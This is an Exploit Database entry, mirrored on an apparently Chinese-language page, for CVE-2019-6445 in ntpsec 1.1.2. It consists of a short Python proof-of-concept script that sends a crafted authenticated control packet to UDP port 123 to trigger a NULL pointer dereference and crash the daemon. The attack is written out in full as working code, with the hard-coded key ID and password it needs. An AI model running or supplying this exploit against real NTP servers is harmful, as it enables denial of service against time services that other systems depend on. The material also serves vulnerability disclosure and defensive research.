NTPsec 1.1.2 – ‘ntp_control’ (Authenticated) NULL Pointer Dereference (PoC)

• Exploit Database
• 16 阅读

• 作者： Magnus Klaaborg Stubman
  日期： 2019-01-16
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/46177/

• #!/usr/bin/env python
  # Exploit Title: ntpsec 1.1.2 authenticated NULL pointer exception Proof of concept
  # Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman)
  # Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
  # Website: https://dumpco.re/bugs/ntpsec-authed-npe 
  # Vendor Homepage: https://ntpsec.org/ 
  # Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz 
  # Affected versions: ntpsec 1.1.0, 1.1.1, 1.1.2
  # CVE: CVE-2019-6445
  # Note: this PoC uses Keyid 1 with password 'gurka'
  
  import sys
  import socket
  
  buf = ("\x16\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x6c\x65\x61\x70" +
   "\x00\x00\x00\x01\x5c\xb7\x3c\xdc\x9f\x5c\x1e\x6a\xc5\x9b\xdf\xf5" +
   "\x56\xc8\x07\xd4")
  
  sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  sock.sendto(buf, ('127.0.0.1', 123))